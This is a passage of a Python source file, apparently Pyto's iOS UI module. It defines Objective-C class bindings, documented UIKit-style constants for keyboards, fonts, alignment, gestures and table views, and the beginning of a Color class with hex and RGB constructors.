from PIL import Image
except ImportError:
pass
if "sphinx" not in sys.modules:
from toga_iOS.widgets.box import Box as iOSBox
from toga_iOS.colors import native_color
import toga
class __v__:
def __init__(self, string):
self.s = string
def __eq__(self, other):
return other == self.s
def __repr__(self):
return self.s
#############################
# MARK: - Objective-C Classes
#############################
__PyView__ = __Class__("PyView")
__PyScrollView__ = __Class__("PyScrollView")
__PyControl__ = __Class__("PyControl")
__PyStackView__ = __Class__("PyStackView")
__PyStackSpacerView__ = __Class__("PyStackSpacerView")
__PySlider__ = __Class__("PySlider")
__PySegmentedControl__ = __Class__("PySegmentedControl")
__PySwitch__ = __Class__("PySwitch")
__PyButton__ = __Class__("PyButton")
__PyLabel__ = __Class__("PyLabel")
__UIImageView__ = __Class__("PyImageView")
__PyTextView__ = __Class__("PyTextView")
__PyTextField__ = __Class__("PyTextField")
__PyTableView__ = __Class__("PyTableView")
__PyTableViewCell__ = __Class__("PyTableViewCell")
__PyTableViewSection__ = __Class__("PyTableViewSection")
__PyWebView__ = __Class__("PyWebView")
__PyGestureRecognizer__ = __Class__("PyGestureRecognizer")
__PyUIKitView__ = __Class__("PyUIKitView")
__PyColor__ = __Class__("PyColor")
__PyButtonItem__ = __Class__("PyButtonItem")
__PyTextInputTraitsConstants__ = __Class__("PyTextInputTraitsConstants")
try:
__NSData__ = ObjCClass("NSData")
except NameError:
pass
###################
# MARK: - Constants
###################
# MARK: - Gesture Recognizer Type
GESTURE_TYPE = ui_constants.GESTURE_TYPE
GESTURE_TYPE_LONG_PRESS = ui_constants.GESTURE_TYPE_LONG_PRESS
"""
A long press gesture.
"""
GESTURE_TYPE_PAN = ui_constants.GESTURE_TYPE_PAN
"""
A dragging gesture.
"""
GESTURE_TYPE_TAP = ui_constants.GESTURE_TYPE_TAP
"""
A tap gesture.
"""
# MARK: - Keyboard Appearance
KEYBOARD_APPEARANCE = ui_constants.KEYBOARD_APPEARANCE
KEYBOARD_APPEARANCE_DEFAULT = ui_constants.KEYBOARD_APPEARANCE_DEFAULT
"""
Specifies the default keyboard appearance for the current input method.
"""
KEYBOARD_APPEARANCE_LIGHT = ui_constants.KEYBOARD_APPEARANCE_LIGHT
"""
Specifies a keyboard appearance suitable for a light UI look.
"""
KEYBOARD_APPEARANCE_DARK = ui_constants.KEYBOARD_APPEARANCE_DARK
"""
Specifies a keyboard appearance suitable for a dark UI look.
"""
# MARK: - Keyboard Type
KEYBOARD_TYPE = ui_constants.KEYBOARD_TYPE
KEYBOARD_TYPE_DEFAULT = ui_constants.KEYBOARD_TYPE_DEFAULT
"""
Specifies the default keyboard for the current input method.
"""
KEYBOARD_TYPE_ASCII_CAPABLE = ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE
"""
Specifies a keyboard that displays standard ASCII characters.
"""
KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD = (
ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD
)
"""
Specifies a number pad that outputs only ASCII digits.
"""
KEYBOARD_TYPE_DECIMAL_PAD = ui_constants.KEYBOARD_TYPE_DECIMAL_PAD
"""
Specifies a keyboard with numbers and a decimal point.
"""
KEYBOARD_TYPE_EMAIL_ADDRESS = ui_constants.KEYBOARD_TYPE_EMAIL_ADDRESS
"""
Specifies a keyboard optimized for entering email addresses. This keyboard type prominently features the at (“@”), period (“.”) and space characters.
"""
KEYBOARD_TYPE_NAME_PHONE_PAD = ui_constants.KEYBOARD_TYPE_NAME_PHONE_PAD
"""
Specifies a keypad designed for entering a person’s name or phone number. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBER_PAD = ui_constants.KEYBOARD_TYPE_NUMBER_PAD
"""
Specifies a numeric keypad designed for PIN entry. This keyboard type prominently features the numbers 0 through 9. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION = (
ui_constants.KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION
)
"""
Specifies the numbers and punctuation keyboard.
"""
KEYBOARD_TYPE_PHONE_PAD = ui_constants.KEYBOARD_TYPE_PHONE_PAD
"""
Specifies a keypad designed for entering telephone numbers. This keyboard type prominently features the numbers 0 through 9 and the “*” and “#” characters. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_TWITTER = ui_constants.KEYBOARD_TYPE_TWITTER
"""
Specifies a keyboard optimized for Twitter text entry, with easy access to the at (“@”) and hash (“#”) characters.
"""
KEYBOARD_TYPE_URL = ui_constants.KEYBOARD_TYPE_URL
"""
Specifies a keyboard optimized for URL entry. This keyboard type prominently features the period (“.”) and slash (“/”) characters and the “.com” string.
"""
KEYBOARD_TYPE_WEB_SEARCH = ui_constants.KEYBOARD_TYPE_WEB_SEARCH
"""
Specifies a keyboard optimized for web search terms and URL entry. This keyboard type prominently features the space and period (“.”) characters.
"""
# MARK: - Return Key Type
RETURN_KEY_TYPE = ui_constants.RETURN_KEY_TYPE
RETURN_KEY_TYPE_DEFAULT = ui_constants.RETURN_KEY_TYPE_DEFAULT
"""
Specifies that the visible title of the Return key is “return”.
"""
RETURN_KEY_TYPE_CONTINUE = ui_constants.RETURN_KEY_TYPE_CONTINUE
"""
Specifies that the visible title of the Return key is “Continue”.
"""
RETURN_KEY_TYPE_DONE = ui_constants.RETURN_KEY_TYPE_DONE
"""
Specifies that the visible title of the Return key is “Done”.
"""
RETURN_KEY_TYPE_EMERGENCY_CALL = ui_constants.RETURN_KEY_TYPE_EMERGENCY_CALL
"""
Specifies that the visible title of the Return key is “Emergency Call”.
"""
RETURN_KEY_TYPE_GO = ui_constants.RETURN_KEY_TYPE_GO
"""
Specifies that the visible title of the Return key is “Go”.
"""
RETURN_KEY_TYPE_GOOGLE = ui_constants.RETURN_KEY_TYPE_GOOGLE
"""
Specifies that the visible title of the Return key is “Google”.
"""
RETURN_KEY_TYPE_JOIN = ui_constants.RETURN_KEY_TYPE_JOIN
"""
Specifies that the visible title of the Return key is “Join”.
"""
RETURN_KEY_TYPE_NEXT = ui_constants.RETURN_KEY_TYPE_NEXT
"""
Specifies that the visible title of the Return key is “Next”.
"""
RETURN_KEY_TYPE_ROUTE = ui_constants.RETURN_KEY_TYPE_ROUTE
"""
Specifies that the visible title of the Return key is “Route”.
"""
RETURN_KEY_TYPE_SEARCH = ui_constants.RETURN_KEY_TYPE_SEARCH
"""
Specifies that the visible title of the Return key is “Search”.
"""
RETURN_KEY_TYPE_SEND = ui_constants.RETURN_KEY_TYPE_SEND
"""
Specifies that the visible title of the Return key is “Send”.
"""
RETURN_KEY_TYPE_YAHOO = ui_constants.RETURN_KEY_TYPE_YAHOO
"""
Specifies that the visible title of the Return key is “Yahoo”.
"""
# MARK: - Autocapitalization Type
AUTO_CAPITALIZE = ui_constants.AUTO_CAPITALIZE
AUTO_CAPITALIZE_NONE = ui_constants.AUTO_CAPITALIZE_NONE
"""
Specifies that there is no automatic text capitalization.
"""
AUTO_CAPITALIZE_ALL = ui_constants.AUTO_CAPITALIZE_ALL
"""
Specifies automatic capitalization of all characters, such as for entry of two-character state abbreviations for the United States.
"""
AUTO_CAPITALIZE_SENTENCES = ui_constants.AUTO_CAPITALIZE_SENTENCES
"""
Specifies automatic capitalization of the first letter of each sentence.
"""
AUTO_CAPITALIZE_WORDS = ui_constants.AUTO_CAPITALIZE_WORDS
"""
Specifies automatic capitalization of the first letter of each word.
"""
# MARK: - Font Text Style
FONT_TEXT_STYLE = ui_constants.FONT_TEXT_STYLE
FONT_TEXT_STYLE_BODY = ui_constants.FONT_TEXT_STYLE_BODY
"""
The font used for body text.
"""
FONT_TEXT_STYLE_CALLOUT = ui_constants.FONT_TEXT_STYLE_CALLOUT
"""
The font used for callouts.
"""
FONT_TEXT_STYLE_CAPTION_1 = ui_constants.FONT_TEXT_STYLE_CAPTION_1
"""
The font used for standard captions.
"""
FONT_TEXT_STYLE_CAPTION_2 = ui_constants.FONT_TEXT_STYLE_CAPTION_2
"""
The font used for alternate captions.
"""
FONT_TEXT_STYLE_FOOTNOTE = ui_constants.FONT_TEXT_STYLE_FOOTNOTE
"""
The font used in footnotes.
"""
FONT_TEXT_STYLE_HEADLINE = ui_constants.FONT_TEXT_STYLE_HEADLINE
"""
The font used for headings.
"""
FONT_TEXT_STYLE_SUBHEADLINE = ui_constants.FONT_TEXT_STYLE_SUBHEADLINE
"""
The font used for subheadings.
"""
FONT_TEXT_STYLE_LARGE_TITLE = ui_constants.FONT_TEXT_STYLE_LARGE_TITLE
"""
The font style for large titles.
"""
FONT_TEXT_STYLE_TITLE_1 = ui_constants.FONT_TEXT_STYLE_TITLE_1
"""
The font used for first level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_2 = ui_constants.FONT_TEXT_STYLE_TITLE_2
"""
The font used for second level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_3 = ui_constants.FONT_TEXT_STYLE_TITLE_3
"""
The font used for third level hierarchical headings.
"""
# MARK: - Font Size
FONT_SIZE = ui_constants.FONT_SIZE
FONT_LABEL_SIZE = ui_constants.FONT_LABEL_SIZE
"""
Returns the standard font size used for labels.
"""
FONT_BUTTON_SIZE = ui_constants.FONT_BUTTON_SIZE
"""
Returns the standard font size used for buttons.
"""
FONT_SMALL_SYSTEM_SIZE = ui_constants.FONT_SMALL_SYSTEM_SIZE
"""
Returns the size of the standard small system font.
"""
FONT_SYSTEM_SIZE = ui_constants.FONT_SYSTEM_SIZE
"""
Returns the size of the standard system font.
"""
# MARK: - Presentation Mode
PRESENTATION_MODE = ui_constants.PRESENTATION_MODE
PRESENTATION_MODE_SHEET = ui_constants.PRESENTATION_MODE_SHEET
"""
A presentation style that displays the content centered in the screen.
"""
PRESENTATION_MODE_FULLSCREEN = ui_constants.PRESENTATION_MODE_FULLSCREEN
"""
A presentation style in which the presented view covers the screen.
"""
PRESENTATION_MODE_WIDGET = ui_constants.PRESENTATION_MODE_WIDGET
"""
A presentation mode style which simulates a Today Widget. Should be used in app to preview how a widget will look.
"""
# MARK: - Appearance
APPEARANCE = ui_constants.APPEARANCE
APPEARANCE_UNSPECIFIED = ui_constants.APPEARANCE_UNSPECIFIED
"""
An unspecified interface style.
"""
APPEARANCE_LIGHT = ui_constants.APPEARANCE_LIGHT
"""
The light interface style.
"""
APPEARANCE_DARK = ui_constants.APPEARANCE_DARK
"""
The dark interface style.
"""
# MARK: - Auto Resizing
AUTO_RESIZING = ui_constants.AUTO_RESIZING
FLEXIBLE_WIDTH = ui_constants.FLEXIBLE_WIDTH
"""
Resizing performed by expanding or shrinking a view’s width.
"""
FLEXIBLE_HEIGHT = ui_constants.FLEXIBLE_HEIGHT
"""
Resizing performed by expanding or shrinking a view's height.
"""
FLEXIBLE_TOP_MARGIN = ui_constants.FLEXIBLE_TOP_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the top margin.
"""
FLEXIBLE_BOTTOM_MARGIN = ui_constants.FLEXIBLE_BOTTOM_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the bottom margin.
"""
FLEXIBLE_LEFT_MARGIN = ui_constants.FLEXIBLE_LEFT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the left margin.
"""
FLEXIBLE_RIGHT_MARGIN = ui_constants.FLEXIBLE_RIGHT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the right margin.
"""
# MARK: - Content Mode
CONTENT_MODE = ui_constants.CONTENT_MODE
CONTENT_MODE_SCALE_TO_FILL = ui_constants.CONTENT_MODE_SCALE_TO_FILL
"""
The option to scale the content to fit the size of itself by changing the aspect ratio of the content if necessary.
"""
CONTENT_MODE_SCALE_ASPECT_FIT = ui_constants.CONTENT_MODE_SCALE_ASPECT_FIT
"""
The option to scale the content to fit the size of the view by maintaining the aspect ratio. Any remaining area of the view’s bounds is transparent.
"""
CONTENT_MODE_SCALE_ASPECT_FILL = ui_constants.CONTENT_MODE_SCALE_ASPECT_FILL
"""
The option to scale the content to fill the size of the view. Some portion of the content may be clipped to fill the view’s bounds.
"""
CONTENT_MODE_REDRAW = ui_constants.CONTENT_MODE_REDRAW
"""
The option to redisplay the view when the bounds change by invoking the ``setNeedsDisplay()`` method.
"""
CONTENT_MODE_CENTER = ui_constants.CONTENT_MODE_CENTER
"""
The option to center the content in the view’s bounds, keeping the proportions the same.
"""
CONTENT_MODE_TOP = ui_constants.CONTENT_MODE_TOP
"""
The option to center the content aligned at the top in the view’s bounds.
"""
CONTENT_MODE_BOTTOM = ui_constants.CONTENT_MODE_BOTTOM
"""
The option to center the content aligned at the bottom in the view’s bounds.
"""
CONTENT_MODE_LEFT = ui_constants.CONTENT_MODE_LEFT
"""
The option to align the content on the left of the view.
"""
CONTENT_MODE_RIGHT = ui_constants.CONTENT_MODE_RIGHT
"""
The option to align the content on the right of the view.
"""
CONTENT_MODE_TOP_LEFT = ui_constants.CONTENT_MODE_TOP_LEFT
"""
The option to align the content in the top-left corner of the view.
"""
CONTENT_MODE_TOP_RIGHT = ui_constants.CONTENT_MODE_TOP_RIGHT
"""
The option to align the content in the top-right corner of the view.
"""
CONTENT_MODE_BOTTOM_LEFT = ui_constants.CONTENT_MODE_BOTTOM_LEFT
"""
The option to align the content in the bottom-left corner of the view.
"""
CONTENT_MODE_BOTTOM_RIGHT = ui_constants.CONTENT_MODE_BOTTOM_RIGHT
"""
The option to align the content in the bottom-right corner of the view.
"""
# MARK: - Horizontal Alignment
HORIZONTAL_ALIGNMENT = ui_constants.HORIZONTAL_ALIGNMENT
HORIZONTAL_ALIGNMENT_CENTER = ui_constants.HORIZONTAL_ALIGNMENT_CENTER
"""
Aligns the content horizontally in the center of the control.
"""
HORIZONTAL_ALIGNMENT_FILL = ui_constants.HORIZONTAL_ALIGNMENT_FILL
"""
Aligns the content horizontally to fill the content rectangles; text may wrap and images may be stretched.
"""
HORIZONTAL_ALIGNMENT_LEADING = ui_constants.HORIZONTAL_ALIGNMENT_LEADING
"""
Aligns the content horizontally from the leading edge of the control.
"""
HORIZONTAL_ALIGNMENT_LEFT = ui_constants.HORIZONTAL_ALIGNMENT_LEFT
"""
Aligns the content horizontally from the left of the control (the default).
"""
HORIZONTAL_ALIGNMENT_RIGHT = ui_constants.HORIZONTAL_ALIGNMENT_RIGHT
"""
Aligns the content horizontally from the right of the control.
"""
HORIZONTAL_ALIGNMENT_TRAILING = ui_constants.HORIZONTAL_ALIGNMENT_TRAILING
"""
Aligns the content horizontally from the trailing edge of the control.
"""
# MARK: - Vertical Alignment
VERTICAL_ALIGNMENT = ui_constants.VERTICAL_ALIGNMENT
VERTICAL_ALIGNMENT_BOTTOM = ui_constants.VERTICAL_ALIGNMENT_BOTTOM
"""
Aligns the content vertically at the bottom in the control.
"""
VERTICAL_ALIGNMENT_CENTER = ui_constants.VERTICAL_ALIGNMENT_CENTER
"""
Aligns the content vertically in the center of the control.
"""
VERTICAL_ALIGNMENT_FILL = ui_constants.VERTICAL_ALIGNMENT_FILL
"""
Aligns the content vertically to fill the content rectangle; images may be stretched.
"""
VERTICAL_ALIGNMENT_TOP = ui_constants.VERTICAL_ALIGNMENT_TOP
"""
Aligns the content vertically at the top in the control (the default).
"""
# MARK: - Button Type
BUTTON_TYPE = ui_constants.BUTTON_TYPE
BUTTON_TYPE_SYSTEM = ui_constants.BUTTON_TYPE_SYSTEM
"""
A system style button, such as those shown in navigation bars and toolbars.
"""
BUTTON_TYPE_CONTACT_ADD = ui_constants.BUTTON_TYPE_CONTACT_ADD
"""
A contact add button.
"""
BUTTON_TYPE_CUSTOM = ui_constants.BUTTON_TYPE_CUSTOM
"""
No button style.
"""
BUTTON_TYPE_DETAIL_DISCLOSURE = ui_constants.BUTTON_TYPE_DETAIL_DISCLOSURE
"""
A detail disclosure button.
"""
BUTTON_TYPE_INFO_DARK = ui_constants.BUTTON_TYPE_INFO_DARK
"""
An information button that has a dark background.
"""
BUTTON_TYPE_INFO_LIGHT = ui_constants.BUTTON_TYPE_INFO_LIGHT
"""
An information button that has a light background.
"""
# MARK: - Text Alignment
TEXT_ALIGNMENT = ui_constants.TEXT_ALIGNMENT
TEXT_ALIGNMENT_LEFT = ui_constants.TEXT_ALIGNMENT_LEFT
"""
Text is visually left aligned.
"""
TEXT_ALIGNMENT_RIGHT = ui_constants.TEXT_ALIGNMENT_RIGHT
"""
Text is visually right aligned.
"""
TEXT_ALIGNMENT_CENTER = ui_constants.TEXT_ALIGNMENT_CENTER
"""
Text is visually center aligned.
"""
TEXT_ALIGNMENT_JUSTIFIED = ui_constants.TEXT_ALIGNMENT_JUSTIFIED
"""
Text is justified.
"""
TEXT_ALIGNMENT_NATURAL = ui_constants.TEXT_ALIGNMENT_NATURAL
"""
Use the default alignment associated with the current localization of the app. The default alignment for left-to-right scripts is left, and the default alignment for right-to-left scripts is right.
"""
# MARK: - Line Break Mode
LINE_BREAK_MODE = ui_constants.LINE_BREAK_MODE
LINE_BREAK_MODE_BY_WORD_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_WORD_WRAPPING
"""
Wrapping occurs at word boundaries, unless the word itself doesn’t fit on a single line.
"""
LINE_BREAK_MODE_BY_CHAR_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_CHAR_WRAPPING
"""
Wrapping occurs before the first character that doesn’t fit.
"""
LINE_BREAK_MODE_BY_CLIPPING = ui_constants.LINE_BREAK_MODE_BY_CLIPPING
"""
Lines are simply not drawn past the edge of the text container.
"""
LINE_BREAK_MODE_BY_TRUNCATING_HEAD = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_HEAD
"""
The line is displayed so that the end fits in the container and the missing text at the beginning of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_TAIL = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_TAIL
"""
The line is displayed so that the beginning fits in the container and the missing text at the end of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE
"""
The line is displayed so that the beginning and end fit in the container and the missing text in the middle is indicated by an ellipsis glyph. This mode is used for single-line layout; using it with multiline text truncates the text into a single line.
"""
# MARK: - Touch Type
TOUCH_TYPE = ui_constants.TOUCH_TYPE
TOUCH_TYPE_DIRECT = ui_constants.TOUCH_TYPE_DIRECT
"""
A touch resulting from direct contact with the screen.
"""
TOUCH_TYPE_INDIRECT = ui_constants.TOUCH_TYPE_INDIRECT
"""
A touch that did not result from contact with the screen.
"""
TOUCH_TYPE_PENCIL = ui_constants.TOUCH_TYPE_PENCIL
"""
A touch from Apple Pencil.
"""
# MARK: - Gesture State
GESTURE_STATE = ui_constants.GESTURE_STATE
GESTURE_STATE_POSSIBLE = ui_constants.GESTURE_STATE_POSSIBLE
"""
The gesture recognizer has not yet recognized its gesture, but may be evaluating touch events. This is the default state.
"""
GESTURE_STATE_BEGAN = ui_constants.GESTURE_STATE_BEGAN
"""
The gesture recognizer has received touch objects recognized as a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_CHANGED = ui_constants.GESTURE_STATE_CHANGED
"""
The gesture recognizer has received touches recognized as a change to a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_ENDED = ui_constants.GESTURE_STATE_ENDED
"""
The gesture recognizer has received touches recognized as the end of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_CANCELLED = ui_constants.GESTURE_STATE_CANCELLED
"""
The gesture recognizer has received touches resulting in the cancellation of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_RECOGNIZED = ui_constants.GESTURE_STATE_RECOGNIZED
"""
The gesture recognizer has received a multi-touch sequence that it recognizes as its gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
# MARK: - Table View Cell Style
TABLE_VIEW_CELL_STYLE = ui_constants.TABLE_VIEW_CELL_STYLE
TABLE_VIEW_CELL_STYLE_DEFAULT = ui_constants.TABLE_VIEW_CELL_STYLE_DEFAULT
"""
A simple style for a cell with a text label (black and left-aligned) and an optional image view.
"""
TABLE_VIEW_CELL_STYLE_SUBTITLE = ui_constants.TABLE_VIEW_CELL_STYLE_SUBTITLE
"""
A style for a cell with a left-aligned label across the top and a left-aligned label below it in smaller gray text.
"""
TABLE_VIEW_CELL_STYLE_VALUE1 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE1
"""
A style for a cell with a label on the left side of the cell with left-aligned and black text; on the right side is a label that has smaller blue text and is right-aligned. The Settings application uses cells in this style.
"""
TABLE_VIEW_CELL_STYLE_VALUE2 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE2
"""
A style for a cell with a label on the left side of the cell with text that is right-aligned and blue; on the right side of the cell is another label with smaller text that is left-aligned and black. The Phone/Contacts application uses cells in this style.
"""
# MARK: - Table View Cell Accessory Type
ACCESSORY_TYPE = ui_constants.ACCESSORY_TYPE
ACCESSORY_TYPE_NONE = ui_constants.ACCESSORY_TYPE_NONE
"""
No accessory view.
"""
ACCESSORY_TYPE_CHECKMARK = ui_constants.ACCESSORY_TYPE_CHECKMARK
"""
A checkmark image.
"""
ACCESSORY_TYPE_DETAIL_BUTTON = ui_constants.ACCESSORY_TYPE_DETAIL_BUTTON
"""
An information button.
"""
ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON = (
ui_constants.ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON
)
"""
An information button and a disclosure (chevron) control.
"""
ACCESSORY_TYPE_DISCLOSURE_INDICATOR = ui_constants.ACCESSORY_TYPE_DISCLOSURE_INDICATOR
"""
A chevron-shaped control for presenting new content.
"""
# MARK: - Table View Style
TABLE_VIEW_STYLE = ui_constants.TABLE_VIEW_STYLE
TABLE_VIEW_STYLE_PLAIN = ui_constants.TABLE_VIEW_STYLE_PLAIN
"""
A plain table view.
"""
TABLE_VIEW_STYLE_GROUPED = ui_constants.TABLE_VIEW_STYLE_GROUPED
"""
A table view whose sections present distinct groups of rows.
"""
# MARK: - Text Field Border Style
TEXT_FIELD_BORDER_STYLE = ui_constants.TEXT_FIELD_BORDER_STYLE
TEXT_FIELD_BORDER_STYLE_NONE = ui_constants.TEXT_FIELD_BORDER_STYLE_NONE
"""
The text field does not display a border.
"""
TEXT_FIELD_BORDER_STYLE_BEZEL = ui_constants.TEXT_FIELD_BORDER_STYLE_BEZEL
"""
Displays a bezel-style border for the text field. This style is typically used for standard data-entry fields.
"""
TEXT_FIELD_BORDER_STYLE_LINE = ui_constants.TEXT_FIELD_BORDER_STYLE_LINE
"""
Displays a thin rectangle around the text field.
"""
TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT = ui_constants.TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT
"""
Displays a rounded-style border for the text field.
"""
# MARK: - Button Item Style
BUTTON_ITEM_STYLE = ui_constants.BUTTON_ITEM_STYLE
BUTTON_ITEM_STYLE_PLAIN = ui_constants.BUTTON_ITEM_STYLE_PLAIN
"""
Glows when tapped. The default item style.
"""
BUTTON_ITEM_STYLE_DONE = ui_constants.BUTTON_ITEM_STYLE_DONE
"""
The style for a done button—for example, a button that completes some task and returns to the previous view.
"""
# MARK: - Button Item System Item
SYSTEM_ITEM = ui_constants.SYSTEM_ITEM
SYSTEM_ITEM_ACTION = ui_constants.SYSTEM_ITEM_ACTION
"""
The system action button.
"""
SYSTEM_ITEM_ADD = ui_constants.SYSTEM_ITEM_ADD
"""
The system plus button containing an icon of a plus sign.
"""
SYSTEM_ITEM_BOOKMARKS = ui_constants.SYSTEM_ITEM_BOOKMARKS
"""
The system bookmarks button.
"""
SYSTEM_ITEM_CAMERA = ui_constants.SYSTEM_ITEM_CAMERA
"""
The system camera button.
"""
SYSTEM_ITEM_CANCEL = ui_constants.SYSTEM_ITEM_CANCEL
"""
The system Cancel button, localized.
"""
SYSTEM_ITEM_COMPOSE = ui_constants.SYSTEM_ITEM_COMPOSE
"""
The system compose button.
"""
SYSTEM_ITEM_DONE = ui_constants.SYSTEM_ITEM_DONE
"""
The system Done button, localized.
"""
SYSTEM_ITEM_EDIT = ui_constants.SYSTEM_ITEM_EDIT
"""
The system Edit button, localized.
"""
SYSTEM_ITEM_FAST_FORWARD = ui_constants.SYSTEM_ITEM_FAST_FORWARD
"""
The system fast forward button.
"""
SYSTEM_ITEM_FLEXIBLE_SPACE = ui_constants.SYSTEM_ITEM_FLEXIBLE_SPACE
"""
Blank space to add between other items. The space is distributed equally between the other items. Other item properties are ignored when this value is set.
"""
SYSTEM_ITEM_ORGANIZE = ui_constants.SYSTEM_ITEM_ORGANIZE
"""
The system organize button.
"""
SYSTEM_ITEM_PAUSE = ui_constants.SYSTEM_ITEM_PAUSE
"""
The system pause button.
"""
SYSTEM_ITEM_PLAY = ui_constants.SYSTEM_ITEM_PLAY
"""
The system play button.
"""
SYSTEM_ITEM_REDO = ui_constants.SYSTEM_ITEM_REDO
"""
The system redo button.
"""
SYSTEM_ITEM_REFRESH = ui_constants.SYSTEM_ITEM_REFRESH
"""
The system refresh button.
"""
SYSTEM_ITEM_REPLY = ui_constants.SYSTEM_ITEM_REPLY
"""
The system reply button.
"""
SYSTEM_ITEM_REWIND = ui_constants.SYSTEM_ITEM_REWIND
"""
The system rewind button.
"""
SYSTEM_ITEM_SAVE = ui_constants.SYSTEM_ITEM_SAVE
"""
The system Save button, localized.
"""
SYSTEM_ITEM_SEARCH = ui_constants.SYSTEM_ITEM_SEARCH
"""
The system search button.
"""
SYSTEM_ITEM_STOP = ui_constants.SYSTEM_ITEM_STOP
"""
The system stop button.
"""
SYSTEM_ITEM_TRASH = ui_constants.SYSTEM_ITEM_TRASH
"""
The system trash button.
"""
SYSTEM_ITEM_UNDO = ui_constants.SYSTEM_ITEM_UNDO
"""
The system undo button.
"""
###############
# MARK: - Other Classes
###############
# MARK: - Color
class Color:
"""
A ``Color`` object represents a color to be displayed on screen.
Example:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
# RGB
black = ui.Color.rgb(0, 0, 0, 1)
# White
white = ui.Color.white(1, 1)
# Dynamic
background = ui.Color.dynamic(light=white, dark=black)
For pre-defined colors, see `Color <constants.html#ui-elements-colors>`_ constants.
"""
__py_color__ = None
def _hex_to_rgb(self, hx, hsl=False):
if re.compile(r'#[a-fA-F0-9]{3}(?:[a-fA-F0-9]{3})?$').match(hx):
div = 255.0 if hsl else 0
if len(hx) <= 4:
return tuple(int(hx[i]*2, 16) / div if div else
int(hx[i]*2, 16) for i in (1, 2, 3))
return tuple(int(hx[i:i+2], 16) / div if div else
int(hx[i:i+2], 16) for i in (1, 3, 5))
raise ValueError(f'"{hx}" is not a valid HEX code.')
def configure_from_dictionary(self, obj):
cls = Color
if isinstance(obj, str):
if obj.startswith("#"):
color = self._hex_to_rgb(obj)
self.__py_color__ = cls.rgb(color[0]/255, color[1]/255, color[2]/255).__py_color__
else:
name = "color_"+obj
name = name.upper()
self.__py_color__ = globals()[name].__py_color__
elif isinstance(obj, dict):
if "dark" in obj and "light" in obj:
light = cls.__new__()
light.configure_from_dictionary(obj["light"])
dark = cls.__new__()
dark.configure_from_dictionary(obj["dark"])
self.__py_color__ = cls.dynamic(light, dark).__py_color__
else:
try:
alpha = obj["alpha"]
except KeyError:
alpha = 1
self.__py_color__ = cls.rgb(obj["red"], obj["green"], obj["blue"], alpha).__py_color__
else:
return None
def dictionary_representation(self):
if self._dark is not None and self._light is not None:
return {
"dark": self._dark.dictionary_representation(),
"light": self._light.dictionary_representation()
}
else:
everything = list(globals().keys()).copy()
declared_colors = []
for key in everything:
if key.startswith("COLOR_") and isinstance(globals()[key], Color):
declared_colors.append(key)
for color_name in declared_colors:
if globals()[color_name].__py_color__.isEqual(self.__py_color__):
return color_name.lower().split("color_")[1]
return {
"red": self.red(),
"green": self.green(),
"blue": self.blue(),
"alpha": self.alpha()
}
def red(self) -> float:
"""
Returns the red value of the color.
:rtype: float
"""
return float(self.__py_color__.red)
def green(self) -> float:
"""
Returns the green value of the color.
:rtype: float
"""
return float(self.__py_color__.green)
def blue(self) -> float:
"""
Returns the blue value of the color.
:rtype: float
"""
return float(self.__py_color__.blue)
def alpha(self) -> float:
"""
Returns the alpha value of the color.
:rtype: float
"""
return float(self.__py_color__.alpha)
def __init__(self, py_color):
self.__py_color__ = py_color
self._light = None
self._dark = None
# def __del__(self):
# self.__py_color__.release()
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_color__.managed.description)+">"
@classmethod
def rgb(cls, red: float, green: float, blue, alpha: float = 1) -> Color:
"""
Initializes a color from RGB values.
All values should be located between 0 and 1, not between 0 and 255.
:param red: The red value.
:param green: The geen value.
:param blue: The blue value.
:param alpha: The opacity value.
:rtype: pyto_ui.Color
"""
check(red, "red", [float, int])
check(green, "green", [float, int])
check(blue, "blue", [float, int])
check(alpha, "alpha", [float, int])
if red > 1 or green > 1 or blue > 1 or alpha > 1:
raise ValueError("Values must be located between 0 and 1.")
return cls(__PyColor__.colorWithRed(red, green=green, blue=blue, alpha=alpha))
@classmethod
def white(cls, white: float, alpha: float) -> Color:
"""
Initializes and returns a color from white value.
All values should be located between 0 and 1, not between 0 and 255.
:param white: The grayscale value.
:param alpha: The opacity value.
:rtype: pyto_ui.Color
"""
check(white, "white", [float, int])
check(alpha, "alpha", [float, int])
if white > 1 or alpha > 1:
raise ValueError("Values must be located between 0 and 1.")
return cls(__PyColor__.colorWithWhite(white, alpha=alpha))
@classmethod
def dynamic(cls, light: Color, dark: Color) -> Color:
"""
